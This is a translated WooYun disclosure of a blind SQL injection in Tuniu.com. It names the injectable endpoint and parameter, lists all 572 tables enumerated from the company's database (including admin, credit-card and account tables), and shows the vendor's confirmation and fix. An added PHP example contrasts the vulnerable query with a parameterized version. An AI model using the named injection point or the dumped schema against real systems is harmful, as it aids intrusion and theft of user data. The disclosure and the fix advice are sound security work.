
Vulnerability summary (24 followers)

Defect ID: wooyun-2012-013504

Title: SQL injection in Tuniu.com (途牛旅行网) puts the information of millions of users at risk

Vendor: Tuniu.com (途牛旅游网)

Author: Hackx7

Submitted: 2012-10-19 14:48

Fix deadline: 2012-12-03 14:48

Public disclosure: 2012-12-03 14:48

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 18

Status: Confirmed by vendor

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]



Vulnerability details

Disclosure status:

2012-10-19: Details sent to the vendor; awaiting vendor handling
2012-10-19: Vendor confirmed; details visible to the vendor only
2012-10-29: Details disclosed to core white hats and domain experts
2012-11-08: Details disclosed to regular white hats
2012-11-18: Details disclosed to intern white hats
2012-12-03: Details disclosed to the public

Brief description:

SQL injection vulnerability; the entire contents of the database can be read through the injection.

Detailed description:

http://www.tuniu.com/main.php?do=route_ajax_new&date=&flag=2&cache=0.44604623204620797&route_id=76041
This is the injection point (blind injection).
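The report only names the endpoint and the parameter, so the following is an added illustration of the defect class and its fix, not code from the original report or from tuniu.com. It contrasts a handler that splices the `route_id` query parameter into the SQL text (the pattern that yields a blind injection like the one above) with a hardened handler that validates the value as an integer and binds it through a prepared statement. The table and column names (`routes`, `id`, `name`), the PDO connection details and the function names are assumptions for the example.

```php
<?php
// Added example (not code from the report or from tuniu.com): a minimal
// route-lookup AJAX handler in two versions. Table/column names and the
// connection DSN/credentials are assumptions.

// --- Vulnerable pattern: untrusted input pasted straight into the SQL text.
function find_route_unsafe(PDO $db, string $routeId): array
{
    // Whatever characters $routeId contains become part of the statement,
    // so the client controls the WHERE clause. Even when nothing is echoed
    // back, true/false or timing differences leak one bit per request,
    // which is exactly what a blind injection exploits.
    $sql = "SELECT id, name FROM routes WHERE id = " . $routeId;
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// --- Hardened pattern: validate the type, then bind as a parameter.
function find_route_safe(PDO $db, string $routeId): array
{
    // route_id is a numeric identifier; reject anything else before it
    // reaches the database. FILTER_VALIDATE_INT refuses strings with
    // quotes, spaces, keywords, or any non-digit content.
    $id = filter_var($routeId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return [];
    }
    // A prepared statement fixes the query structure on the server; the
    // value travels separately and is never parsed as SQL.
    $stmt = $db->prepare('SELECT id, name FROM routes WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Handler wiring mirroring the main.php?do=route_ajax_new&route_id=... shape
// from the report. DSN, user and password are placeholders.
$db = new PDO('mysql:host=localhost;dbname=tuniu;charset=utf8mb4', 'DB_USER', 'DB_PASS', [
    PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES => false, // use real server-side prepares
]);
header('Content-Type: application/json; charset=utf-8');
echo json_encode(find_route_safe($db, $_GET['route_id'] ?? ''));
```

Parameterization removes the injection, but the table listing in the proof section is also worth reading as a privilege finding: the account the web front end used could enumerate all 572 tables in the `tuniu` schema, including `admin_user`, `user_credit_card` and `user_account`. Granting the web-facing database user SELECT only on the tables the public site needs would have bounded what any future injection in this application could reach.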

Proof of vulnerability:

This is the database table structure. I didn't do anything bad, just testing.
Database: tuniu
[572 tables]
+-----------------------------------+
| aboard_gro_order_extra |
| aboard_sin_order_extra |
| abroad_tip |
| access_log |
| activities |
| activities_classes |
| activities_pic_url |
| activity_hotel |
| activity_new |
| additional_products |
| admin_user |
| advise |
| agency |
| agency_popu |
| agency_popu_block |
| agency_popu_block_route |
| agency_record |
| agency_route_email |
| agency_show_web_info |
| air_lines |
| air_ports |
| answers |
| area |
| area_desc_category |
| area_description |
| area_hotel |
| ashore_tourism |
| asks_place |
| asks_weekstar |
| backpack_hotel |
| backpack_hotel_additional |
| backpack_hotel_agency_relation |
| backpack_hotel_cat |
| backpack_hotel_cat_relate |
| backpack_hotel_for_theme |
| backpack_hotel_order |
| backpack_hotel_package |
| backpack_hotel_photo |
| backpack_hotel_room |
| backpack_hotel_room_plan |
| backpack_hotel_taocan |
| backpack_hotel_type |
| backpack_hotel_type_relate |
| backpack_online_order |
| backpack_room_agency_relation |
| backpack_room_relation_plan |
| bank |
| bank_act |
| bank_note |
| book_city |
| book_email |
| bot_visit_log |
| bus_cat |
| bus_company |
| bus_line |
| bus_line_part |
| bus_station |
| bus_station_cat |
| calllog |
| campaign |
| campaign_balance |
| campaign_click_record |
| campaign_pay_record |
| campaign_record |
| cat_destination_relate |
| cat_group_hotel |
| cat_groups |
| cat_hot_route |
| cat_routes_change |
| cat_tag |
| channel_keyword |
| channel_visit_data |
| channel_visit_log |
| channels |
| charge_area |
| checi |
| checi_bak |
| christmas_click |
| christmas_contact |
| christmas_gift |
| city_info |
| city_station |
| city_station_bak |
| cmb_pay |
| comment_photos |
| comment_robot |
| comments_ask |
| comments_diss |
| comments_group |
| comments_place |
| comments_platter |
| comments_route |
| comments_route_agency |
| comments_user_photo |
| company_demand |
| company_tour |
| company_travel_schedule |
| conf |
| confirm_start_notice_email |
| contract_down_load |
| contracts |
| coupon |
| coupon_detail |
| coupon_log |
| coupon_total_ip |
| coupon_total_ip_all |
| crm_bug |
| crm_email |
| crm_file |
| crm_finance_invoice |
| crm_insure_tourist |
| crm_news |
| crm_rule |
| crm_saler_profit_log |
| crontab_sql |
| crontab_task |
| crontab_time |
| cvs |
| dali_vote |
| database_info |
| database_info_detail |
| date_online |
| departure |
| destination |
| destination_cat |
| destination_cat_bak |
| destination_cat_parent |
| destination_price_statistic |
| diss |
| diss_vote |
| ditie_route |
| ditie_station |
| ditie_station_line |
| domes_gr_order_extra |
| drequest |
| dujia_mudidi |
| dujia_mudidi_cat |
| duser |
| emotions |
| eticket |
| eticket_batch |
| eticket_config |
| eticket_express_list |
| eticket_express_price |
| eticket_name_config |
| eticket_price |
| eticket_price_config |
| eticket_relate_route |
| favorites_photo |
| finance_ips_pay_log |
| finance_kuaiqian_pay_apply_log |
| finance_kuaiqian_pay_log |
| flight_class_info |
| flight_info |
| flight_letter |
| fmis_invoice |
| fmis_invoice_apply |
| fmis_invoice_no |
| fmis_online_bank |
| fmis_online_bank_card |
| friends |
| global_log |
| group_code |
| group_code_parsed |
| group_code_temp |
| group_keywords |
| group_purchase_city_notice |
| group_purchase_product_routes |
| group_purchase_right_column |
| group_purchase_subscribe |
| group_sort |
| group_visit_history |
| groups |
| heartbeat |
| history |
| holiday_comment |
| holiday_place |
| holiday_place_config |
| holiday_place_photo |
| holiday_place_recommend |
| holiday_place_relate |
| hot_route |
| hot_route_new |
| hotel |
| hotel_area |
| hotel_flight_position |
| hotel_order |
| hotel_plan |
| hotel_relation |
| hotel_room |
| hotel_room_price |
| hotel_room_relation |
| hotel_route_relation |
| index_core_route |
| index_manage |
| index_manage_parsed |
| index_order_email |
| index_view_num |
| insurance_temp |
| invoice_tmp |
| ip_address |
| ip_address2 |
| ip_address2_old |
| ip_area |
| ip_log |
| ips_pay_log |
| jdv2_comment |
| jdv2_comment_check |
| jdv2_comment_data |
| labor_activity |
| labor_invite_friend |
| labor_prize |
| labor_prize_list |
| labor_qtmbb_prize |
| links |
| logs_baixingapi |
| long_bus_area |
| long_bus_cat |
| long_bus_cat_detail |
| long_bus_line |
| long_bus_station |
| maps |
| messages |
| messages_in |
| messages_out |
| messages_out_email |
| metro_comment |
| mobile |
| mobile_old |
| nation |
| nationality |
| net_address_template |
| net_order |
| net_order_address |
| net_order_pay_log |
| net_order_shop |
| net_order_shop_log |
| net_to_crm_pay_log |
| news |
| news_place |
| notes |
| online_confirm_file |
| online_pay_visit_log |
| operator_area |
| order_backpack_union |
| order_complaint |
| order_email |
| order_etickets |
| order_etickets_batch |
| order_etickets_customer |
| order_etickets_status |
| order_flights |
| order_holiday |
| order_hotel |
| order_insure |
| order_online_sign |
| order_position |
| order_promotion_event |
| order_recall |
| order_recall_2 |
| order_save_tmp |
| order_sign_choose |
| order_status_history |
| order_step |
| order_ticket |
| order_travel_person_num_7days |
| order_weiyi_cid |
| other_tours |
| other_tours_plan |
| p_agency |
| p_air_type |
| p_air_type_photo |
| p_airport |
| p_cabin |
| p_cabin_plan |
| p_flight |
| p_ticket |
| p_ticket_agency_relation |
| p_ticket_area |
| p_ticket_cabin |
| p_ticket_cat |
| p_ticket_plan |
| p_ticket_relation_plan |
| package_10_20_mapping |
| package_cat |
| package_hotel_tmp |
| package_info |
| package_new |
| package_roominfo_tmp |
| package_union |
| package_union_child |
| package_union_plan |
| package_union_total |
| packages |
| packages_detail |
| packages_hotel |
| packages_insure |
| packages_plan |
| packages_product |
| packages_schedule |
| partner_adv_doc |
| partner_adv_flash |
| partner_adv_pic |
| partner_coupon_exchange |
| partner_homepage_manage |
| partner_new_adv_doc |
| partner_new_adv_doc_cat |
| partner_new_adv_pic |
| partner_new_answer |
| partner_new_ask |
| partner_new_check_email |
| partner_new_commision |
| partner_new_letter |
| partner_new_letter_file |
| partner_new_pay |
| partner_new_pay_order |
| partner_new_photo |
| partner_new_pic_adv_photo |
| partner_pay |
| partner_reg |
| partners |
| partners_new |
| passage_cat |
| passage_kind |
| passage_list |
| passage_photo |
| passage_top |
| passages |
| phone_code |
| photos_diss |
| photos_flickr |
| place_area |
| place_books |
| place_description |
| place_everyday |
| place_judge |
| place_location |
| place_price |
| place_sort |
| place_visit_history |
| place_visit_history_200904 |
| place_visit_history_200905 |
| place_visit_history_200906 |
| place_vote_log |
| place_vote_name |
| places |
| planedata |
| planedata_desc |
| platters |
| platters_place |
| platters_tag |
| platters_vote |
| post_robot |
| posts_blog |
| posts_group |
| posts_group_category |
| posts_place |
| pre_sh5year_list |
| price_order |
| price_order_cat |
| product_act |
| product_cat_relate |
| product_comment |
| promotion_product |
| promotion_route_info |
| province_city |
| rates |
| refers |
| relate_link |
| route_agency_relation |
| route_cat_tag |
| route_comment_photos |
| route_destination |
| route_destination_tag |
| route_file |
| route_join_group |
| route_notice |
| route_place |
| route_place_agency |
| route_play_type |
| route_position |
| route_position_group |
| route_relate_ticket |
| route_schedule |
| route_special_area |
| route_special_manage |
| route_submit_error |
| route_tag_related_destination |
| route_theme_relate |
| route_visit_history |
| routes |
| routes_agency |
| routes_agency_addition |
| routes_agency_detail |
| routes_agency_from_external |
| routes_agency_log |
| routes_agency_plan |
| routes_agency_search |
| routes_agency_theme_cat |
| routes_agency_view_log |
| routes_cat |
| routes_coupon |
| routes_depart |
| routes_insure |
| routes_order |
| routes_plan |
| routes_product |
| routes_scheme |
| routes_scheme_plan |
| routes_theme |
| routes_union |
| routes_vote |
| salers |
| salers_change |
| sales_index |
| schedule_attraction |
| schedule_shop |
| schedules |
| schedules_agency |
| script_task |
| search_record |
| search_sum_history |
| seatprice |
| send_etickets_record |
| shop_info |
| shz_prize |
| shz_prize_list |
| site_classification |
| site_classification_other_info |
| site_classification_status_info |
| site_classification_tkd |
| site_classification_tkd_templates |
| site_group_code |
| sorts |
| special |
| special_place |
| special_post |
| special_route |
| sql_count |
| station |
| station_bak |
| stats_robot |
| sub_company_info |
| sub_sites |
| sub_sites_links |
| surcharge |
| survey |
| survey_answer |
| survey_m |
| system_code |
| tags_photo |
| tags_route |
| taobao_route_map |
| td_c_membcard_type |
| team_price_detail |
| team_price_general |
| team_refer_price |
| temp_channel |
| tf_c_cust_sysexten |
| tf_c_cust_userexten |
| tf_c_membship |
| tf_c_other_reg |
| tf_c_signoff_log |
| ticket_base |
| ticket_destinations |
| ticket_homepage_manage |
| ticket_info |
| ticket_order |
| ticket_order_detail |
| ticket_photo |
| ticket_place_lable |
| ticket_send |
| tips |
| tkt_info |
| tkt_scenic |
| tkt_scenic_photos |
| tn_cat |
| tn_cat_change |
| tn_cat_city |
| tn_routes_pos |
| tour_area_desc |
| tour_plan |
| tourist |
| tourist_hotel |
| tourist_order |
| tourist_order_status |
| tourist_plan |
| tourist_record |
| tourist_template |
| tourist_ticket |
| trace_log |
| train_lines |
| train_lines_part |
| train_stations |
| transfer_data |
| transfer_log |
| transfer_zt |
| travel_coupon |
| travel_coupon_use |
| travel_info |
| travel_info_detail |
| upload_file |
| upttdata_log |
| user_account |
| user_account_log |
| user_admin |
| user_admin_log |
| user_coin_log |
| user_consume |
| user_coupon |
| user_coupon_log |
| user_credit_card |
| user_finance_get_motopay |
| user_group |
| user_invitation |
| user_invite |
| user_niuren_uid |
| user_niuren_uid_ip |
| user_online |
| user_order |
| user_order_agreement |
| user_order_extra |
| user_order_flight |
| user_order_hotel |
| user_order_insurance |
| user_order_other |
| user_order_pay |
| user_order_pay_log |
| user_partner |
| user_photo |
| user_place |
| user_place_visit_history |
| user_report_error |
| user_route |
| user_route_visit_history |
| user_tenpay_log |
| user_web_order_pay |
| userlist |
| users |
| videos_place |
| visa |
| visa_content |
| visa_email |
| visa_file |
| visa_particular |
| visit_cat |
| visitor |
| visitor1 |
| vote_group |
| vote_group_log |
| weather |
| weather_cat |
| weather_city_code |
| weather_detail |
| weather_icon |
| weather_infos |
| weatherinfo_2011 |
| weatherinfo_2012 |
| weatherinfo_2013 |
| weatherinfo_2014 |
| weatherinfo_2015 |
| weatherinfo_2016 |
| weatherinfo_2017 |
| weatherinfo_2018 |
| weatherinfo_2019 |
| weatherinfo_2020 |
| web_model_res |
| wiki |
| wiki_entry |
| wiki_refer |
| wiki_tag |
| youlun_recommend |
+-----------------------------------+

Fix recommendation:

Let the programmers fix it themselves; I only report vulnerabilities.
by H4ckx7

Copyright notice: when reposting, please credit the source: Hackx7@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2012-10-19 15:10

Vendor reply:

Thanks to Hackx7@乌云; we will fix it as soon as possible.

Latest status:

2012-10-19: Fixed, thank you

